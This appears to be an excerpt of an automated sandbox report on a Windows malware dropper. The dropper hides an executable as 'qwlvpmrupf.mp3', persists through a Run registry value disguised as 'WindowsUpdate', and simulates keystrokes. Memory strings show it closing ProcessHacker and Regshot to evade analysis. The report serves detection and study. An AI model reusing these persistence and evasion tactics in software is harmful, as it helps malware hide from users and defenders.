                Source: Binary string: RegSvcs.pdb source: qwlvpmrupf.mp3, 00000007.00000003.1924745407.000000000113D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000000.1924462508.00000000005C2000.00000002.00000001.01000000.0000000C.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2054601563.000000000182C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2185950312.0000000001A71000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2271006709.0000000001493000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wkernelbase.pdbUGP source: OpenWith.exe, 0000000F.00000003.1935175992.00000000059C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934921441.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wkernel32.pdbUGP source: OpenWith.exe, 0000000F.00000003.1934628698.00000000058C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934512366.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
                Source: ngPebbPhbp.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: ngPebbPhbp.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: ngPebbPhbp.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: ngPebbPhbp.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: ngPebbPhbp.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_00375D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,7_2_00375D78
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_6003703Jump to behavior
                Source: ngPebbPhbp.exeStatic PE information: section name: .didat
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: 0_2_00B26680 push ecx; ret 0_2_00B26693
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: 0_2_00B25773 push ecx; ret 0_2_00B25786
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003C0330 push edi; ret 7_2_003C0333
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_00390E06 push ecx; ret 7_2_00390E19
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_0038DBFE push eax; iretd 7_2_0038DC01
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 14_2_05563170 push ecx; iretd 14_2_0556317C
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 14_2_05563130 pushad ; ret 14_2_05563138
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 14_2_055651E2 push eax; retf 14_2_055651F1
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 14_2_05563C62 push es; retf 14_2_05563C91
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 14_2_05563C95 push es; retf 14_2_05563C91
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 14_2_05561F50 push eax; retf 14_2_05561F51
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 14_2_05565777 push esi; ret 14_2_05565782
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 14_2_055637A2 push ebp; iretd 14_2_055637A3
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 14_2_05564E69 push ebx; iretd 14_2_05564E6A
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 14_2_05565A80 push edx; ret 14_2_05565A81
                Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 15_3_03284B00 push edx; ret 15_3_03284B01
                Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 15_3_03282D15 push es; retf 15_3_03282D11
                Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 15_3_032821B0 pushad ; ret 15_3_032821B8
                Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 15_3_032821F0 push ecx; iretd 15_3_032821FC
                Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 15_3_032847F7 push esi; ret 15_3_03284802
                Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 15_3_03280FD0 push eax; retf 15_3_03280FD1
                Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 15_3_03282822 push ebp; iretd 15_3_03282823
                Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 15_3_03284262 push eax; retf 15_3_03284271
                Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 15_3_03283EE9 push ebx; iretd 15_3_03283EEA
                Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 15_3_03282CE2 push es; retf 15_3_03282D11
                Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 15_2_05A5FF00 push eax; ret 15_2_05A5FF2E
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00DE0332 push edi; ret 16_2_00DE0333
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00DB0E06 push ecx; ret 16_2_00DB0E19
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00DADC00 push eax; iretd 16_2_00DADC01
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 17_2_01BF61A3 push CF1CE871h; iretd 17_2_01BF61AA
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 17_2_01BF602F push D090E871h; iretd 17_2_01BF6036

                Persistence and Installation Behavior

                barindex
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3File created: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3File created: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3File created: C:\Users\user\AppData\Local\Temp\RegSvcs.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3File created: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3Jump to dropped file
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeFile created: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe.exeJump to dropped file
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3File created: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run WindowsUpdateJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run WindowsUpdateJump to behavior
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdateJump to behavior
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdateJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_004025A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,7_2_004025A0
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_0038FC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,7_2_0038FC8A
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00E225A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,16_2_00E225A0
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00DAFC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,16_2_00DAFC8A
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Process information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Process information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Process information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Process information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Process information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\OpenWith.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\OpenWith.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\OpenWith.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: qwlvpmrupf.mp3 PID: 7640, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: qwlvpmrupf.mp3.exe PID: 8072, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: qwlvpmrupf.mp3.exe PID: 8188, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: qwlvpmrupf.mp3.exe PID: 4092, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7940, type: MEMORYSTR
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                Source: C:\Windows\SysWOW64\OpenWith.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                Source: C:\Windows\SysWOW64\OpenWith.exeAPI/Special instruction interceptor: Address: 5A6A83A
                Source: qwlvpmrupf.mp3.exe, 00000010.00000003.2076809860.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000002.2079814695.00000000017FC000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076956481.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2077127799.00000000017FC000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000002.2301475753.0000000001465000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
                Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2214116379.0000000001A34000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2214030847.0000000001A25000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215974566.0000000001A38000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2212858946.00000000019CD000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2216069254.0000000001A3A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213569719.00000000019D0000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000002.2217801117.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213912161.0000000001A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE)_M
                Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2213298133.00000000019A3000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000002.2217573693.00000000019A5000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215926455.00000000019A5000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213000386.0000000001994000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215658045.00000000019A4000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2214246439.00000000019A4000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215081504.00000000019A4000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2121860556.0000000001986000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")C
                Source: qwlvpmrupf.mp3, 00000007.00000002.1953687346.0000000001073000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947073721.0000000001066000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1950281908.0000000001073000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947262131.000000000106A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1829676845.0000000001055000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1948261084.0000000001072000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1946884763.000000000105D000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000002.2079423406.0000000001763000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1992063073.0000000001733000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2078136333.0000000001762000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
